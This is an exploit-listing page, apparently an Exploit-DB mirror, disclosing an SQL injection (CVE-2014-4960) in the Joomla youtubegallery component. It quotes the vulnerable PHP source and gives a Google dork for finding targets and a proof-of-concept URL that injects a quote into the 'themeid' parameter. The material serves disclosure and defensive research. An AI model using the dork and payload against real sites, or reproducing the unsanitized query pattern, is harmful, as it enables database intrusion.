header-logo
Suggest Exploit
vendor:
Joomla component com_youtubegallery
by:
Pham Van Khanh
7.5
CVSS
HIGH
SQL Injection
89 (SQL Injection)
CWE
Product Name: Joomla component com_youtubegallery
Affected Version From: 4.x
Affected Version To: 3.x (possibly)
Patch Exists: NO
Related CWE: CVE-2014-4960
CPE: a:joomla:com_youtubegallery
Metasploit:
Other Scripts:
Platforms Tested: Joomla 1.5, 2.5, 3
2014

Joomla component com_youtubegallery – SQL Injection vulnerability

The Joomla component com_youtubegallery is vulnerable to SQL Injection. The vulnerability exists in the 'gallery.php' file. The parameters 'listid' and 'themeid' are not properly sanitized before being used in constructing an SQL query, which allows an attacker to inject malicious SQL code.

Mitigation:

The vendor should sanitize user input before using it in SQL queries. Users are advised to update to the latest version of the software.
Source

Exploit-DB raw data:

# Exploit Title: Joomla component com_youtubegallery - SQL Injection
vulnerability
# Google Dork: inurl:index.php?option=com_youtubegallery
# Date: 15-07-2014
# Exploit Author: Pham Van Khanh (phamvankhanhbka@gmail.com)
# Vendor Homepage: http://www.joomlaboat.com/youtube-gallery
# Software Link: http://www.joomlaboat.com/youtube-gallery
# Version: 4.x ( 3.x maybe)
# Tested on: newest version 4.1.7 on Joomla 1.5, 2.5, 3
# CVE : CVE-2014-4960

Detail:
In line: 40, file: components\com_youtubegallery\models\gallery.php,
if parameter listid is int (or can cast to int), $listid and $themeid
will not santinized.
Source code:
40: if(JRequest::getInt('listid'))
41: {
42:        //Shadow Box
43:        $listid=JRequest::getVar('listid');
44:
45:
46:        //Get Theme
47:         $m_themeid=(int)JRequest::getVar('mobilethemeid');
48:         if($m_themeid!=0)
49:         {
50:              if(YouTubeGalleryMisc::check_user_agent('mobile'))
51:                    $themeid=$m_themeid;
52:              else
53:                    $themeid=JRequest::getVar('themeid');
54:              }
55:          else
56:               $themeid=JRequest::getVar('themeid');
57: }
After, $themeid and $listid are used in line 86, 92. Two method
getVideoListTableRow and getThemeTableRow concat string to construct
sql query. So it is vulnerable to SQL Injection.
Source code:
86: if(!$this->misc->getVideoListTableRow($listid))
87: {
88:         echo '<p>No video found</p>';
89:         return false;
90: }
91:
92: if(!$this->misc->getThemeTableRow($themeid))
93: {
94:          echo '<p>No video found</p>';
95:          return false;
96: }

# Site POF: http://server/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1'&videoid=ETMVUuFbToQ&tmpl=component&TB_iframe=true&height=500&width=700

Navigation

Suggest Exploit

Services By CQR